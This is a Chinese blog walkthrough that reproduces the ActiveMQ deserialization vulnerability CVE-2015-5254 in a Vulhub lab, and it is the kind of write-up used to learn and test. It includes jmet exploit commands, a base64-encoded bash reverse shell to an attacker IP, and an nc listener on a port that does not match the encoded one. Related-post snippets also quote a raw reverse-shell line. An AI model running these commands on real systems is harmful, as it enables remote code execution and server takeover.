ActiveMQ反序列化漏洞(CVE-2015-5254)复现

于 2024-01-16 17:14:29 发布
阅读量374 收藏 8
点赞数 7
文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69994768/article/details/135627815
版权

简介:

Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

影响版本:

Apache ActiveMQ 5.13.0之前5.x版本。

Kali-Docker环境搭建:

kali linux 下搭建 Vulhub 靶场(图文详解)_kali安装vulhub-CSDN博客

漏洞复现:

首先打开kali虚拟机cd到vulhub目录:cd vulhub

再cd到activemq目录打开CVE-2015-5254环境:
cd activemq 
cd  CVE-2015-5254
编译环境: docker-compose build
运行环境: docker-compose up -d

这个时候可以在自己的浏览器输入靶机ip打开环境web网页:密码admin/admin

然后下载漏洞利用工具 :
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

输入: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 192.168.199.120  61616 (自己靶机ip) 

注释:-Q指定队列消息名,-I指定JMS客户端,这里是ActiveMQ,-Y指定具体的命令,-Yp指定payload类型,其后分别是ActiveMQ所在机器的ip及工作端口

 现在会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://ip:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息

点击消息就可以触发漏洞。
 

然后使用反弹shell的命令输入:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMTk5LjEwOS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.199.120 61616

前面是输入自己的IP后进行的编码 后面是输入被攻击者的IP

然后另开一个窗口打开监听命令:nc -nvlp 8080 

最后可以发现已经反弹shell主机已上线。至此复现完毕。感谢大家!!!

m0_69994768
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具,ActiveMQ漏洞反序列化漏洞CVE-2015-5254,利用工具,工具
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3659
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 508
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmet的jar文件,并在同目录下创建一个external文件夹 链接:https://g...
CVE-2015-5254ActiveMQ 反序列化漏洞复现
p_utao的博客
03-19 381
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7723
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
最新发布
baidu_26383841的博客
10-18 227
Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
activemq-cpp-library-3.9.5编译的C++库文件,支持vs2015,vs2017,包括了依赖的库文件和头文件,可以在项目中直接使用。
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
【vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1772
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1466
ActiveMQ 反序列化漏洞
vulhub学习(1) ActiveMQ反序列化漏洞CVE-2015-5254复现
yukinorong的博客
06-24 1344
漏洞环境 配置vulhub , 在目录activemq/CVE-2015-5254中打开docker。 docker中显示 此时开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞复现 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2825
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ 反序列化漏洞复现及利用
Tauil的博客
07-19 1020
会发现什么都没有发生,但是在被攻击机中输入bash-i>&/dev/tcp/攻击机IP/44440>&1他是可以正常连接的,说明命令没有问题,那么唯一的可能就是存在了检验,不给执行该命令,所以我们可以进行简单的绕过,将命令进行base64编码。java-jarjmet-0.1.0-all.jar-Qhacker-IActiveMQ-s-Y“bash-i>&/dev/tcp/攻击机IP/44440>&1”-YpROME被攻击机IP61616。(一定要是java8!......
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现实验报告
weixin_48400575的博客
01-20 2655
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现实验报告
ActiveMQ 反序列化漏洞CVE-2015-5254复现
糖小喵
04-12 311
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 漏洞复现
wswr的博客
03-04 1130
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-CSDN博客_kali搭建靶场 原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。 Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值